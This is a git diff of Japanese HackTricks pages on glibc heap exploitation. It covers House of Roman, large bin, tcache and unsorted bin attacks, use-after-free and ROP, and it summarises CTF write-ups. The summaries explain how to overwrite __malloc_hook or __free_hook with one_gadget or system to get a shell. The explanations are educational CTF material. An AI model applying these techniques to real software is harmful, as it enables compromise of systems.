\_\_malloc_hookをsystemに設定 -ステップ1では、`__malloc_hook`を含むチャンクを制御することができ(変数`malloc_hook_chunk`内)、ステップ2ではここに`main_arena + 0x68`を書き込むことに成功しました。 +ステップ1では、`__malloc_hook`を含むチャンク(変数`malloc_hook_chunk`)を制御することに成功しました。ステップ2では、ここに`main_arena + 0x68`を書き込むことができました。 -今、`malloc_hook_chunk`内の部分的な上書きを悪用して、そこに書き込んだlibcアドレス(`main_arena + 0x68`)を**`one_gadget`アドレスにポイントさせます**。 +今、`malloc_hook_chunk`の部分的な上書きを悪用して、そこに書き込んだlibcアドレス(`main_arena + 0x68`)を**`one_gadget`アドレスにポイントさせます**。 ここで**12ビットのランダム性をブルートフォースする必要があります**(詳細は[how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[の例](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)を参照してください)。 -最後に、正しいアドレスが上書きされたら、**`malloc`を呼び出して`one_gadget`をトリガーします**。 +最後に、正しいアドレスが上書きされたら、**`malloc`を呼び出して`one_gadget`をトリガーします。** ## 参考文献 diff --git a/src/binary-exploitation/libc-heap/large-bin-attack.md b/src/binary-exploitation/libc-heap/large-bin-attack.md index 9d2556c89..fd3abc21f 100644 --- a/src/binary-exploitation/libc-heap/large-bin-attack.md +++ b/src/binary-exploitation/libc-heap/large-bin-attack.md @@ -2,22 +2,23 @@ {{#include ../../banners/hacktricks-training.md}} -## 基本情報 +## Basic Information + +大きなビンについての詳細は、このページを参照してください: -大きなビンについての詳細はこのページを参照してください: {{#ref}} bins-and-memory-allocations.md {{#endref}} -[**how2heap - large bin attack**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c) で素晴らしい例を見つけることができます。 +[**how2heap - large bin attack**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c) には素晴らしい例があります。 -基本的に、最新の "current" バージョンの glibc (2.35) では、**`P->bk_nextsize`** がチェックされていないため、特定の条件が満たされると、大きなビンチャンクの値で任意のアドレスを変更することができます。 +基本的に、最新の "current" バージョンの glibc (2.35) では、**`P->bk_nextsize`** がチェックされておらず、特定の条件が満たされると、大きなビンチャンクの値で任意のアドレスを変更できることがわかります。 -その例では、以下の条件が見つかります: +その例では、以下の条件が見られます: - 大きなチャンクが割り当てられる -- 最初のものより小さいが同じインデックスにある大きなチャンクが割り当てられる +- 最初のものより小さいが同じインデックスの大きなチャンクが割り当てられる - ビン内で最初に入る必要があるため、より小さくなければならない - (トップチャンクとのマージを防ぐためのチャンクが作成される) - その後、最初の大きなチャンクが解放され、それより大きな新しいチャンクが割り当てられる -> Chunk1 が大きなビンに入る @@ -42,9 +43,9 @@ victim->bk_nextsize = fwd->fd->bk_nextsize; // p2->bk_nextsize = p1->fd->bk_next fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; // p1->fd->bk_nextsize->fd_nextsize = p2 } ``` -これは、libcの**`global_max_fast`グローバル変数を上書きするために使用される可能性があり**、その後、大きなチャンクを使用してファストビン攻撃を悪用します。 +これは、libcの**`global_max_fast`グローバル変数を上書きするために使用される可能性があり、より大きなチャンクでファストビン攻撃を悪用することができます。** -この攻撃の別の素晴らしい説明は、[**guyinatuxedo**](https://guyinatuxedo.github.io/32-largebin_attack/largebin_explanation0/index.html)で見つけることができます。 +この攻撃の別の素晴らしい説明は[**guyinatuxedo**](https://guyinatuxedo.github.io/32-largebin_attack/largebin_explanation0/index.html)で見つけることができます。 ### その他の例 diff --git a/src/binary-exploitation/libc-heap/tcache-bin-attack.md b/src/binary-exploitation/libc-heap/tcache-bin-attack.md index aa4f3e4da..0aebd963b 100644 --- a/src/binary-exploitation/libc-heap/tcache-bin-attack.md +++ b/src/binary-exploitation/libc-heap/tcache-bin-attack.md @@ -4,44 +4,45 @@ ## 基本情報 -Tcache bin についての詳細はこのページを参照してください: +Tcache bin についての詳細はこのページを確認してください: + {{#ref}} bins-and-memory-allocations.md {{#endref}} -まず最初に、TcacheはGlibcバージョン2.26で導入されたことに注意してください。 +まず、Tcache は Glibc バージョン 2.26 で導入されたことに注意してください。 -**Tcache攻撃**(**Tcache poisoning**とも呼ばれる)は、[**guyinatuxidoページ**](https://guyinatuxedo.github.io/29-tcache/tcache_explanation/index.html)で提案されており、目的は解放されたチャンク内のビンの次のチャンクへのポインタを任意のアドレスに上書きすることで、後でその特定のアドレスを**割り当ててポインタを上書きする**ことが可能になります。 +**Tcache 攻撃**(**Tcache poisoning** とも呼ばれる)は、[**guyinatuxido ページ**](https://guyinatuxedo.github.io/29-tcache/tcache_explanation/index.html) で提案されており、目的は解放されたチャンク内の次のチャンクへのポインタを任意のアドレスに上書きすることで、後でその特定のアドレスを**割り当ててポインタを上書きする**ことが可能になります。 -しかし、現在、前述のコードを実行すると、エラーが発生します:**`malloc(): unaligned tcache chunk detected`**。したがって、新しいポインタに書き込むアドレスはアラインされたアドレスである必要があります(または、書き込まれたアドレスが実際にアラインされるまでバイナリを十分に実行する必要があります)。 +しかし、現在では、前述のコードを実行するとエラーが発生します: **`malloc(): unaligned tcache chunk detected`**。したがって、新しいポインタに書き込むアドレスはアラインされたアドレスである必要があります(または、書き込まれたアドレスが実際にアラインされるまでバイナリを十分に実行する必要があります)。 -### Tcacheインデックス攻撃 +### Tcache インデックス攻撃 -通常、ヒープの最初に**インデックスごとのチャンクの数**を含むチャンクと、各Tcacheインデックスの**ヘッドチャンクのアドレス**が見つかります。何らかの理由でこの情報を変更できる場合、**特定のインデックスのヘッドチャンクを希望のアドレス**(例えば`__malloc_hook`)にポイントさせることが可能になり、その後インデックスのサイズのチャンクを割り当てて、`__malloc_hook`の内容を上書きすることができます。 +通常、ヒープの最初に **インデックスごとのチャンクの数** を含むチャンクと **各 Tcache インデックスのヘッドチャンクへのアドレス** が見つかります。何らかの理由でこの情報を変更できる場合、**特定のインデックスのヘッドチャンクを希望のアドレス**(例えば `__malloc_hook`)にポイントさせることが可能になり、その後インデックスのサイズのチャンクを割り当ててこの場合の `__malloc_hook` の内容を上書きすることができます。 ## 例 - CTF [https://guyinatuxedo.github.io/29-tcache/dcquals19_babyheap/index.html](https://guyinatuxedo.github.io/29-tcache/dcquals19_babyheap/index.html) -- **Libc情報漏洩**:Tcacheを埋め、未ソートリストにチャンクを追加し、Tcacheを空にし、**未ソートビンからチャンクを再割り当てする**ことが可能です。最初の8Bを上書きするだけで、**チャンクからのlibcの2番目のアドレスをそのままにしておくことができます**。 -- **Tcache攻撃**:バイナリは1Bのヒープオーバーフローに脆弱です。これを利用して、割り当てられたチャンクの**サイズヘッダー**を変更して大きくします。その後、このチャンクは**解放され**、偽のサイズのチャンクのTcacheに追加されます。次に、偽のサイズのチャンクを割り当てると、前のチャンクが**返され、実際にはこのチャンクが小さいことがわかります**。これにより、**メモリ内の次のチャンクを上書きする**機会が得られます。\ -これを利用して、**次のチャンクのFDポインタを**`malloc_hook`にポイントさせ、最初に修正した正当なポインタを割り当て、その後の割り当てで**`malloc_hook`**にチャンクを返すことが可能になります。これを利用して**one gadget**を書き込むことができます。 +- **Libc 情報漏洩**: Tcache を埋め、未ソートリストにチャンクを追加し、Tcache を空にし、**未ソート bin からチャンクを再割り当てする**ことが可能です。最初の 8B を上書きするだけで、**チャンクからの libc への 2 番目のアドレスをそのままにしておくことができます**。 +- **Tcache 攻撃**: バイナリは 1B ヒープオーバーフローに対して脆弱です。これを利用して、割り当てられたチャンクの **サイズヘッダー** を変更して大きくします。その後、このチャンクは **解放され**、偽のサイズのチャンクの Tcache に追加されます。次に、偽のサイズのチャンクを割り当てると、前のチャンクが **返され、実際にはこのチャンクが小さいことがわかります**。これにより、**メモリ内の次のチャンクを上書きする**機会が得られます。\ +これを利用して、**次のチャンクの FD ポインタを** **`malloc_hook`** にポイントさせ、最初に修正した正当なポインタを割り当て、その後の割り当てで **`malloc_hook`** にチャンクを返すことが可能になります。これを利用して **one gadget** を書き込むことができます。 - CTF [https://guyinatuxedo.github.io/29-tcache/plaid19_cpp/index.html](https://guyinatuxedo.github.io/29-tcache/plaid19_cpp/index.html) -- **Libc情報漏洩**:使用後の解放と二重解放があります。この書き込みでは、著者が小さなビンに配置されたチャンクのアドレスを読み取ることでlibcのアドレスを漏洩させました(未ソートビンから漏洩するのと同様ですが、小さなビンからです)。 -- **Tcache攻撃**:Tcacheは**二重解放**を介して実行されます。同じチャンクが2回解放されるため、Tcache内でチャンクは自分自身を指します。その後、割り当てられ、FDポインタが**free hook**を指すように変更され、再度割り当てられると、リスト内の次のチャンクがfree hookに入ります。次に、これも割り当てられ、ここに`system`のアドレスを書き込むことが可能になるため、`"/bin/sh"`を含むmallocが解放されるとシェルが得られます。 +- **Libc 情報漏洩**: 使用後の解放と二重解放があります。この書き込みでは、著者が小さな bin に配置されたチャンクのアドレスを読み取ることで libc のアドレスを漏洩させました(未ソート bin から漏洩させるのと同様ですが、小さな bin からです)。 +- **Tcache 攻撃**: Tcache は **二重解放** を介して実行されます。同じチャンクが 2 回解放されるため、Tcache 内でチャンクは自分自身を指します。その後、割り当てられ、FD ポインタが **free hook** を指すように変更され、再度割り当てられると、リスト内の次のチャンクが free hook に配置されます。次に、これも割り当てられ、ここに `system` のアドレスを書き込むことが可能になるため、`"/bin/sh"` を含む malloc が解放されるとシェルが得られます。 - CTF [https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps0/index.html](https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps0/index.html) -- ここでの主な脆弱性は、オフセットを指定することでヒープ内の任意のアドレスを`free`できる能力です。 -- **Tcacheインデックス攻撃**:Tcacheチャンク(Tcacheビンの情報を持つチャンク)内に格納されるサイズのチャンクを割り当てて解放することで、**値0x100のアドレスを生成する**ことが可能です。これは、Tcacheが各ビンのチャンク数を異なるバイトに格納するため、特定のインデックスのチャンクが値0x100を生成するからです。 -- その後、この値はサイズ0x100のチャンクがあるように見えます。これにより、このアドレスを`free`することで悪用できます。これにより、**Tcache内のサイズ0x100のチャンクのインデックスにそのアドレスが追加されます**。 -- 次に、**サイズ0x100のチャンクを割り当てると、前のアドレスがチャンクとして返され、他のTcacheインデックスを上書きすることが可能になります**。\ -例えば、malloc hookのアドレスをそのうちの1つに入れ、そのインデックスのサイズのチャンクを割り当てることで、calloc hookにチャンクを得ることができ、one gadgetを書き込んでシェルを得ることができます。 +- ここでの主な脆弱性は、オフセットを指定することでヒープ内の任意のアドレスを `free` できる能力です。 +- **Tcache インデックス攻撃**: Tcache チャンク内に格納されたサイズのチャンクを割り当てて解放することが可能で、これにより **値 0x100 のアドレス** が生成されます。これは、Tcache が各 bin のチャンク数を異なるバイトで保存するため、特定のインデックスのチャンクが値 0x100 を生成するからです。 +- 次に、この値はサイズ 0x100 のチャンクが存在するように見えます。これにより、このアドレスを `free` することで悪用できます。これにより、**そのアドレスが Tcache 内のサイズ 0x100 のチャンクのインデックスに追加されます**。 +- 次に、**サイズ 0x100 のチャンクを割り当てると、前のアドレスがチャンクとして返され、他の Tcache インデックスを上書きすることが可能になります。**\ +例えば、malloc hook のアドレスをそのうちの一つに入れ、そのインデックスのサイズのチャンクを割り当てることで calloc hook にチャンクを得ることができ、これにより one gadget を書き込んでシェルを得ることができます。 - CTF [https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps1/index.html](https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps1/index.html) -- 前回と同じ脆弱性ですが、1つの追加制限があります。 -- **Tcacheインデックス攻撃**:前回と似た攻撃ですが、**Tcache情報を含むチャンクを解放する**ことでステップを減らします。これにより、そのアドレスがそのサイズのTcacheインデックスに追加され、そのサイズを割り当ててTcacheチャンク情報をチャンクとして取得できるようになります。これにより、free hookをインデックスのアドレスとして追加し、割り当てて、one gadgetを書き込むことが可能になります。 +- 前回と同じ脆弱性ですが、1 つの追加制限があります。 +- **Tcache インデックス攻撃**: 前の攻撃と似ていますが、**Tcache 情報を含むチャンクを解放することによって**手順を減らします。これにより、そのアドレスがそのサイズの Tcache インデックスに追加され、そのサイズを割り当てて Tcache チャンク情報をチャンクとして取得できるようになります。これにより、インデックスのアドレスとして free hook を追加し、割り当てて、one gadget を上書きすることが可能になります。 - [**Math Door. HTB Cyber Apocalypse CTF 2023**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/math-door/) -- **Write After Free**で`fd`ポインタに数値を追加します。 -- このチャレンジでは多くの**ヒープフェンシュイ**が必要です。書き込みでは、**Tcache**のフリーリストのヘッドを制御することが非常に便利であることが示されています。 -- **Glibc漏洩**を`stdout`を介して(FSOP)。 -- **Tcache poisoning**を使用して任意の書き込みプリミティブを取得します。 +- `fd` ポインタに数値を追加するための **Write After Free**。 +- このチャレンジでは多くの **heap feng-shui** が必要です。書き込みでは、**Tcache** のフリーリストのヘッドを制御することが非常に便利であることが示されています。 +- `stdout` を介した **Glibc 漏洩** (FSOP)。 +- 任意の書き込みプリミティブを得るための **Tcache poisoning**。 {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md index 3c0cd4288..8c1b30a13 100644 --- a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md +++ b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md @@ -4,52 +4,53 @@ ## 基本情報 -未整理ビンについての詳細は、このページを確認してください: +未整理ビンについての詳細はこのページを確認してください: + {{#ref}} bins-and-memory-allocations.md {{#endref}} -未整理リストは、チャンクの `bk` アドレスに `unsorted_chunks (av)` のアドレスを書き込むことができます。したがって、攻撃者が未整理ビン内のチャンクの `bk` ポインタのアドレスを**変更できる**場合、彼は**任意のアドレスにそのアドレスを書き込む**ことができ、これはGlibcのアドレスを漏洩させたり、いくつかの防御を回避するのに役立ちます。 +未整理リストは、チャンクの `bk` アドレスに `unsorted_chunks (av)` のアドレスを書き込むことができます。したがって、攻撃者が未整理ビン内のチャンクの `bk` ポインタのアドレスを**変更できれば**、**そのアドレスを任意のアドレスに書き込むことができ**、Glibc アドレスを漏洩させたり、一部の防御を回避したりするのに役立ちます。 基本的に、この攻撃は**任意のアドレスに大きな数を設定する**ことを可能にします。この大きな数はアドレスであり、ヒープアドレスまたはGlibcアドレスである可能性があります。典型的なターゲットは**`global_max_fast`**であり、これによりより大きなサイズのファストビンを作成できるようになります(未整理ビン攻撃からファストビン攻撃に移行することができます)。 > [!TIP] -> 提供された例を見て、[https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle)で0x4000と0x5000をチャンクサイズとして使用すると(Tcacheを避けるため)、**現在**エラー**`malloc(): unsorted double linked list corrupted`**がトリガーされることがわかります。 +> 提供された例を見て、[https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) で 0x4000 と 0x5000 をチャンクサイズとして使用すると(Tcacheを避けるため)、**現在**エラー **`malloc(): unsorted double linked list corrupted`** がトリガーされることがわかります。 > -> したがって、この未整理ビン攻撃は、(他のチェックの中で)ダブルリンクリストを修正できる必要があり、`victim->bk->fd == victim`または`victim->fd == av (arena)`でないことが必要です。これは、書き込みたいアドレスがその`fd`位置にフェイクチャンクのアドレスを持ち、フェイクチャンクの`fd`がアリーナを指していることを意味します。 +> したがって、この未整理ビン攻撃は、(他のチェックの中で)二重リンクリストを修正できる必要があるため、`victim->bk->fd == victim` または `victim->fd == av (arena)` でないことが要求されます。これは、書き込みたいアドレスがその `fd` ポジションにフェイクチャンクのアドレスを持ち、フェイクチャンクの `fd` がアリーナを指している必要があることを意味します。 > [!CAUTION] > この攻撃は未整理ビンを破損させることに注意してください(したがって小さなものと大きなものも)。したがって、**現在はファストビンからの割り当てのみを使用できます**(より複雑なプログラムは他の割り当てを行い、クラッシュする可能性があります)、これをトリガーするには、**同じサイズを割り当てる必要があります。さもなければプログラムはクラッシュします。** > -> **`global_max_fast`**を上書きすることは、この場合に役立つかもしれません。ファストビンが他のすべての割り当てを処理できると信頼して、エクスプロイトが完了するまで。 +> **`global_max_fast`** を上書きすることは、この場合に役立つかもしれません。ファストビンが他のすべての割り当てを処理できると信頼して、エクスプロイトが完了するまで。 -[**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html)のコードは非常によく説明していますが、mallocを変更してメモリを十分に大きく割り当て、Tcacheに終わらないようにすると、前述のエラーが発生し、この技術を妨げることができます:**`malloc(): unsorted double linked list corrupted`** +[**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html) のコードは非常によく説明していますが、mallocを修正して十分な大きさのメモリを割り当て、Tcacheに終わらないようにすると、前述のエラーが発生し、この技術を妨げることがわかります:**`malloc(): unsorted double linked list corrupted`** ## 未整理ビン情報漏洩攻撃 -これは実際には非常に基本的な概念です。未整理ビン内のチャンクにはポインタが含まれます。未整理ビンの最初のチャンクは、実際には**`fd`**と**`bk`**リンクが**メインアリーナ(Glibc)の一部を指しています**。\ -したがって、チャンクを未整理ビンに**入れて読み取る**(使用後の解放)か、**ポインタの少なくとも1つを上書きせずに再度割り当ててから**それを**読み取る**ことができれば、**Glibc情報漏洩**を得ることができます。 +これは実際には非常に基本的な概念です。未整理ビン内のチャンクにはポインタが含まれます。未整理ビンの最初のチャンクは、実際には**`fd`** と **`bk`** リンクが**メインアリーナ(Glibc)の一部を指しています**。\ +したがって、**未整理ビン内にチャンクを置いてそれを読み取る**(use after free)か、**ポインタの少なくとも1つを上書きせずに再度割り当ててから**それを**読み取る**ことができれば、**Glibc情報漏洩**を得ることができます。 -この[**書き込みで使用された攻撃**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html)は、4つのチャンク構造(A、B、C、D - Dはトップチャンクとの統合を防ぐためだけに存在します)を悪用するもので、Bでのヌルバイトオーバーフローを使用してCがBが未使用であることを示すようにしました。また、Bでは`prev_size`データが変更され、サイズがBのサイズではなくA+Bになりました。\ -その後、Cが解放され、A+Bと統合されました(ただしBはまだ使用中でした)。サイズAの新しいチャンクが割り当てられ、その後、libcの漏洩アドレスがBに書き込まれ、そこから漏洩しました。 +この書き込みで使用された類似の[**攻撃**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html)は、4つのチャンク構造(A、B、C、D - Dはトップチャンクとの統合を防ぐためだけに存在します)を悪用するもので、Bでのヌルバイトオーバーフローを使用してCがBを未使用として示すようにしました。また、Bでは `prev_size` データが変更され、サイズがBのサイズではなくA+Bになりました。\ +その後、Cが解放され、A+Bと統合されました(ただしBはまだ使用中でした)。サイズAの新しいチャンクが割り当てられ、その後、libcから漏洩したアドレスがBに書き込まれ、そこから漏洩しました。 ## 参考文献と他の例 - [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#hitcon-training-lab14-magic-heap**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#hitcon-training-lab14-magic-heap) - 目標は、4869より大きな値でグローバル変数を上書きすることで、フラグを取得できるようにすることです。PIEは有効になっていません。 -- 任意のサイズのチャンクを生成でき、希望のサイズでヒープオーバーフローがあります。 +- 任意のサイズのチャンクを生成することができ、希望するサイズのヒープオーバーフローがあります。 - 攻撃は3つのチャンクを作成することから始まります:チャンク0はオーバーフローを悪用し、チャンク1はオーバーフローされ、チャンク2はトップチャンクが前のものと統合しないようにします。 -- 次に、チャンク1が解放され、チャンク0がチャンク1の`bk`ポインタを指すようにオーバーフローします:`bk = magic - 0x10` +- 次に、チャンク1が解放され、チャンク0がチャンク1の `bk` ポインタを指すようにオーバーフローされます:`bk = magic - 0x10` - 次に、チャンク1と同じサイズのチャンク3が割り当てられ、これが未整理ビン攻撃をトリガーし、グローバル変数の値を変更し、フラグを取得できるようにします。 - [**https://guyinatuxedo.github.io/31-unsortedbin_attack/0ctf16_zerostorage/index.html**](https://guyinatuxedo.github.io/31-unsortedbin_attack/0ctf16_zerostorage/index.html) - マージ関数は脆弱であり、渡された両方のインデックスが同じであれば、それを再割り当てし、その後解放しますが、解放された領域へのポインタを返します。 - したがって、**2つのチャンクが作成されます**:**チャンク0**は自分自身とマージされ、チャンク1はトップチャンクとの統合を防ぎます。次に、**マージ関数がチャンク0**に対して2回呼び出され、使用後の解放が発生します。 -- 次に、**`view`**関数がインデックス2(使用後の解放チャンクのインデックス)で呼び出され、**libcアドレスが漏洩します**。 -- バイナリには**`global_max_fast`**より大きなサイズのみをmallocする保護があるため、ファストビンは使用されず、未整理ビン攻撃が使用されてグローバル変数`global_max_fast`を上書きします。 -- 次に、インデックス2(使用後の解放ポインタ)で編集関数を呼び出し、`bk`ポインタを`p64(global_max_fast-0x10)`を指すように上書きします。次に、新しいチャンクを作成すると、以前に妥協された解放アドレス(0x20)が使用され、**未整理ビン攻撃がトリガーされ**、`global_max_fast`が非常に大きな値で上書きされ、ファストビンでチャンクを作成できるようになります。 +- 次に、**`view`** 関数がインデックス2(使用後の解放チャンクのインデックス)で呼び出され、**libcアドレスが漏洩します**。 +- バイナリには**`global_max_fast`** より大きなサイズのみをmallocする保護があるため、ファストビンは使用されず、未整理ビン攻撃が使用されてグローバル変数 `global_max_fast` を上書きします。 +- 次に、インデックス2(使用後の解放ポインタ)で編集関数を呼び出し、`bk` ポインタを `p64(global_max_fast-0x10)` を指すように上書きします。次に、新しいチャンクを作成すると、以前に妥協された解放アドレス(0x20)が使用され、**未整理ビン攻撃**がトリガーされ、非常に大きな値の `global_max_fast` を上書きし、ファストビンでチャンクを作成できるようになります。 - その後、**ファストビン攻撃**が実行されます: -- まず、**`__free_hook`**の場所でサイズ200のファストチャンクを操作できることが発見されます: +- まず、**`__free_hook`** の場所でサイズ200のファストチャンクを操作できることが発見されます: - 
gef➤  p &__free_hook
 $1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
 gef➤  x/60gx 0x7ff1e9e607a8 - 0x59
@@ -59,15 +60,15 @@ gef➤  x/60gx 0x7ff1e9e607a8 - 0x59
 0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000      0x0000000000000000
- この場所でサイズ0x200のファストチャンクを取得できれば、実行される関数ポインタを上書きすることが可能になります。 -- そのために、サイズ`0xfc`の新しいチャンクを作成し、そのポインタでマージ関数を2回呼び出します。これにより、ファストビン内のサイズ`0xfc*2 = 0x1f8`の解放されたチャンクへのポインタを取得します。 -- 次に、このチャンクの編集関数が呼び出され、このファストビンの**`fd`**アドレスを前の**`__free_hook`**関数を指すように変更します。 -- 次に、サイズ`0x1f8`のチャンクが作成され、ファストビンから以前の無駄なチャンクを取得し、別のサイズ`0x1f8`のチャンクが作成され、**`__free_hook`**内のファストビンチャンクが**`system`**関数のアドレスで上書きされます。 -- 最後に、文字列`/bin/sh\x00`を含むチャンクが削除関数を呼び出して解放され、**`__free_hook`**関数がトリガーされ、`system`が`/bin/sh\x00`をパラメータとして指します。 +- そのために、サイズ `0xfc` の新しいチャンクを作成し、そのポインタでマージ関数を2回呼び出すことで、サイズ `0xfc*2 = 0x1f8` の解放されたチャンクへのポインタを取得します。 +- 次に、このチャンクの編集関数を呼び出して、このファストビンの**`fd`** アドレスを前の**`__free_hook`** 関数を指すように変更します。 +- 次に、サイズ `0x1f8` のチャンクを作成して、ファストビンから以前の無駄なチャンクを取得し、別のサイズ `0x1f8` のチャンクを作成して**`__free_hook`** でファストビンチャンクを取得し、**`system`** 関数のアドレスで上書きします。 +- 最後に、文字列 `/bin/sh\x00` を含むチャンクを解放し、削除関数を呼び出して、**`__free_hook`** 関数をトリガーし、`system` を `/bin/sh\x00` をパラメータとして指すようにします。 - **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html) -- 1Bオーバーフローを悪用して未整理ビン内のチャンクを統合し、libc情報漏洩を取得し、その後ファストビン攻撃を実行してmallocフックをワンガジェットアドレスで上書きする別の例 +- 1Bオーバーフローを悪用して未整理ビン内のチャンクを統合し、libc情報漏洩を取得し、その後ファストビン攻撃を実行してmallocフックをワンガジェットアドレスで上書きする別の例。 - [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/) -- サイズ`0x100`より大きなチャンクのみを割り当てることができます。 -- 未整理ビン攻撃を使用して`global_max_fast`を上書きします(ASLRのために1/16回機能します。12ビットを変更する必要がありますが、16ビットを変更する必要があります)。 -- グローバルチャンク配列を変更するためのファストビン攻撃。これにより、任意の読み取り/書き込みプリミティブが得られ、GOTを変更していくつかの関数を`system`を指すように設定できます。 +- サイズが `0x100` より大きいチャンクのみを割り当てることができます。 +- 未整理ビン攻撃を使用して `global_max_fast` を上書きします(ASLRのために1/16回機能します。12ビットを変更する必要がありますが、16ビットを変更する必要があります)。 +- グローバルチャンク配列を変更するためのファストビン攻撃。これにより、任意の読み取り/書き込みプリミティブが得られ、GOTを変更し、いくつかの関数を `system` を指すように設定できます。 {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/use-after-free/README.md b/src/binary-exploitation/libc-heap/use-after-free/README.md index c1b952f08..4c3b4c0c6 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/README.md +++ b/src/binary-exploitation/libc-heap/use-after-free/README.md @@ -4,13 +4,13 @@ ## 基本情報 -名前が示すように、この脆弱性はプログラムがオブジェクトのためにヒープに**いくつかのスペースを保存し**、そこに**情報を書き込み**、もう必要ないと思って**解放し**、その後**再度アクセスする**ときに発生します。 +名前が示すように、この脆弱性はプログラムがオブジェクトのためにヒープに**いくつかのスペースを保存し**、そこに**情報を書き込み**、**不要になったために解放し**、その後**再度アクセスする**ときに発生します。 -ここでの問題は、**解放されたメモリにアクセスしても**違法ではない(**エラーは発生しない**)ことです。したがって、プログラム(または攻撃者)が**解放されたメモリを再割り当てし、任意のデータを保存する**ことができた場合、解放されたメモリが最初のポインタからアクセスされると、その**データが上書きされてしまう**ため、**元のデータの感度に依存する脆弱性が発生します**(もしそれが呼び出される関数のポインタであった場合、攻撃者はそれを制御できる可能性があります)。 +ここでの問題は、**解放されたメモリにアクセスしても違法ではない**(**エラーは発生しない**)ことです。したがって、プログラム(または攻撃者)が**解放されたメモリを再割り当てし、任意のデータを保存することができた場合**、解放されたメモリが初期ポインタからアクセスされると、その**データが上書きされることになり**、元のデータの**感度に依存する脆弱性が生じる**ことになります(もしそれが呼び出される関数のポインタであった場合、攻撃者はそれを制御できる可能性があります)。 ### ファーストフィット攻撃 -ファーストフィット攻撃は、glibcのような一部のメモリアロケータが解放されたメモリを管理する方法をターゲットにしています。メモリブロックを解放すると、それはリストに追加され、新しいメモリリクエストはそのリストの末尾から取得されます。攻撃者はこの動作を利用して、**どのメモリブロックが再利用されるかを操作し、潜在的にそれらを制御する**ことができます。これにより、「use-after-free」問題が発生し、攻撃者が**再割り当てされたメモリの内容を変更する**ことで、セキュリティリスクが生じる可能性があります。\ +ファーストフィット攻撃は、glibcのような一部のメモリアロケータが解放されたメモリを管理する方法をターゲットにしています。メモリブロックを解放すると、それはリストに追加され、新しいメモリリクエストはそのリストの末尾から取得されます。攻撃者はこの動作を利用して、**どのメモリブロックが再利用されるかを操作し、潜在的にそれらを制御することができます**。これにより、攻撃者が**再割り当てされるメモリの内容を変更する**「use-after-free」問題が発生し、セキュリティリスクが生じる可能性があります。\ 詳細は以下を確認してください: {{#ref}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/README.md b/src/binary-exploitation/rop-return-oriented-programing/README.md index e2c660049..958ad9bd1 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/README.md @@ -9,8 +9,8 @@ ### ROPの動作 1. **制御フローのハイジャック**: まず、攻撃者はプログラムの制御フローをハイジャックする必要があります。通常はバッファオーバーフローを利用して、スタック上の保存された戻りアドレスを上書きします。 -2. **ガジェットの連鎖**: 次に、攻撃者は慎重にガジェットを選択し、目的のアクションを実行するために連鎖させます。これには、関数呼び出しの引数を設定し、関数を呼び出し(例: `system("/bin/sh")`)、必要なクリーンアップや追加の操作を処理することが含まれます。 -3. **ペイロードの実行**: 脆弱な関数が戻るとき、正当な場所に戻るのではなく、ガジェットの連鎖を実行し始めます。 +2. **ガジェットの連鎖**: 次に、攻撃者は目的のアクションを実行するためにガジェットを慎重に選択し、連鎖させます。これには、関数呼び出しの引数を設定し、関数を呼び出し(例: `system("/bin/sh")`)、必要なクリーンアップや追加の操作を処理することが含まれます。 +3. **ペイロードの実行**: 脆弱な関数が戻ると、正当な場所に戻るのではなく、ガジェットの連鎖を実行し始めます。 ### ツール @@ -21,20 +21,20 @@ ### **x86 (32ビット) 呼び出し規約** - **cdecl**: 呼び出し元がスタックをクリーンアップします。関数引数は逆順(右から左)でスタックにプッシュされます。**引数は右から左にスタックにプッシュされます。** -- **stdcall**: cdeclに似ていますが、呼び出し先がスタックをクリーンアップする責任を負います。 +- **stdcall**: cdeclに似ていますが、呼び出し先がスタックのクリーンアップを担当します。 ### **ガジェットの発見** まず、バイナリまたはそのロードされたライブラリ内で必要なガジェットを特定したと仮定します。私たちが興味を持っているガジェットは次のとおりです: - `pop eax; ret`: このガジェットはスタックのトップの値を `EAX` レジスタにポップし、その後戻ります。これにより `EAX` を制御できます。 -- `pop ebx; ret`: 上記と同様ですが、`EBX` レジスタ用で、`EBX` を制御できるようにします。 